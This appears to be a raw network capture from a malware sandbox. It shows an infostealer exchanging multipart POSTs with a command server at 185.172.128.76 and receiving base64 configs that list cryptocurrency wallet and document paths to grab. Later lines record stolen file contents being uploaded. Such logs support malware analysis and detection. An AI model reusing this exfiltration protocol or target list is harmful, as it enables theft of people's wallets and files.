2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"wallets------FCAFIJJJKEGIECAKKEHI--
Apr 27, 2024 02:20:26.134855032 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Apr 27, 2024 02:20:26.138108969 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"files------GHCGDAFCFHIDBGDHCFCB--
Apr 27, 2024 02:20:26.423995018 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 [TRUNCATED] Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBN [TRUNCATED]
Apr 27, 2024 02:20:26.452708960 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:26.770195007 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:26.775603056 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:27.489249945 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:28.881104946 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHIJDGIEBKKFHJKJKEG Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:29.186351061 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:29.263416052 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:29.569799900 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:29.578474998 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:29.883465052 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:29.888953924 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:30.193886042 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:30.200241089 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:30.505644083 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:30.524327040 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:30.834345102 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:30.870182037 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:31.172732115 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:31.202467918 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:31.506700039 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:31.589046001 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:31.897634029 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:33.236044884 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:33.541258097 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:33.754786968 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:34.061584949 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:34.075155020 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:34.379735947 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:34.412189960 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:34.715635061 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:34.736892939 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:35.043673992 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:35.216276884 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:35.529304028 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:35.533696890 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAEBFHJJDAAKFIECGDB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:35.835180044 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:35.885049105 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:36.404349089 CEST	1289	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 52 45 39 44 55 31 78 49 56 45 46 48 56 6b 52 47 56 55 6c 46 58 45 68 55 51 55 64 57 52 45 5a 56 53 55 55 75 5a 47 39 6a 65 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d [TRUNCATED] Data Ascii: ------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU1xIVEFHVkRGVUlFXEhUQUdWREZVSUUuZG9jeA==------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="file"SFRBR1ZERlVJRUxHWkZDVFpaR1JTUUlTQ1hNT0tTQ0FaRUpWQVBCUEpLQUJJWktFR0ZBR01HT0lVUEhQSk9ZSVdNVklLV0NOVU9XRE1HQ0ZYSlFBTk1NT1VMSVZUUVFHVVpWVk9MWldCWVRIWU9ITU1WSU1UVEJCQ0FJR09OTlJWRVVNVENUQ0VNVFdGTkRTUVBIRVBMQUZaQUtZU1JPWktSUURVWk9VWklLSkdKUklCSk9ESE9VTEpIV1FCSUpTQUlZTVhMRk9TRk9FRktUUVBFRVdGVEZDSUZTTEhYU1hZWEJXVFBDV01DR1BFVE9TVkxOS1lDT05GV0NJVUZFUUtPV1FOUUtKU0laS05aWE9RV01USk9HV0RCVUZCS0RYVVBZWUlYVVRPUFNPVldMVktJT0tGUFNYREFWTUJVWklZWVpVUVRETFpJTVJSR1hMVE9FSk1GV0xPTU5QTkxJQ1BaUEtUSFBYRUxHQllUSkxPSk9FV05SRE5NWFhSWU1BSkJXQ1ROTUJSRUlKRFZWSVhFSEVHWVFLWlFDR0xWSE9DTVVTS1hDUVFNVVJMWUtXVUlVTUZTR1lNWlVRWENUWk9LUVlYSkFVREVWVFNPT1FVS1pLS0VFT0FOR1NJSVdUVVZFR0hUQ09UW [TRUNCATED]
Apr 27, 2024 02:20:36.704269886 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:37.308269978 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:37.616075993 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:37.923588991 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:38.232275963 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:38.293673992 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:38.601752996 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:38.648134947 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:38.954582930 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:38.959604025 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:39.267235041 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:39.304541111 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:39.607467890 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:39.629188061 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:39.935673952 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:39.967562914 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:40.283662081 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:41.426959991 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIE Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:41.729948997 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:42.150767088 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:42.455995083 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:42.467339993 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:42.779098034 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
